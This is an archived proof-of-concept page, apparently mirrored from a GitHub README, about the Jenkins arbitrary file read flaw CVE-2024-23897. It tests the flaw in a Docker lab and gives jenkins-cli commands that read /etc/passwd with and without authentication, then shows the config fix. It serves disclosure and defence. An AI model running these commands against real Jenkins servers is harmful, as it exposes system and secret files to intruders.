关联漏洞
标题:
Jenkins 安全漏洞
(CVE-2024-23897)
描述:Jenkins是Jenkins开源的一个应用软件。一个开源自动化服务器Jenkins提供了数百个插件来支持构建,部署和自动化任何项目。 Jenkins 2.441及之前版本、LTS 2.426.2及之前版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者读取Jenkins控制器文件系统。
描述
on this git you can find all information on the CVE-2024-23897
介绍
# PoC-jenkins-rce_CVE-2024-23897.
<h2>On this git you can find all information on the CVE-2024-23897.</h2>
<div align="center">
<img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/1200px-Jenkins_logo.svg.png" alt="logo-jenkins">
</div>
<h3>Introduction</h3>
The issue, assigned the CVE identifier CVE-2024-23897, has been described as an arbitrary file read vulnerability through the built-in command line interface. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file's contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.
<h3>PoC</h3>
For this PoC, I have installed Jenkins 2.426.2 with Docker to test the exploit of the vulnerability
```
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2
```
After creating a user and a password, I downloaded the Jenkins CLI client (jenkins-cli.jar) on my attacking machine.
<div align="center">
<img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/jenkins-java.png" alt="screen1">
</div>
Then, I wrote the command for the exploit.
In this command, we need to have the credentials of the Jenkins user.
```
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
```
<div align="center">
<img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/Screenshot%20from%202024-01-27%2015-32-50.png" alt="screen2">
</div>
Another command allows displaying the first lines of a file without authentication.
```
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
```
<div align="center">
<img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/noauth.png" alt="screen3">
</div>
<h3>Fix the vulnerability</h3>
To counter this vulnerability, you need to navigate to the Jenkins configuration file named config.xml (in my case, it is located in my Docker container, so I switch to shell mode in my container)
<div align="center">
<img src="https://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897./blob/main/jenkins-resolve.png" alt="screen4">
</div>
and add the line:
```
<expandAtFiles>false</expandAtFiles>
```
and restart jenkins :
```
service jenkins restart
```
文件快照
[4.0K] /data/pocs/2c363c13042f2a64acfd95182da10b3f8e34ffcf
├── [ 69K] 1200px-Jenkins_logo.svg.png
├── [ 11K] free-jenkins-282182.png
├── [ 55K] jenkins-java.png
├── [102K] jenkins-resolve.png
├── [ 20K] noauth.png
├── [2.3K] README.md
└── [ 82K] Screenshot from 2024-01-27 15-32-50.png
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。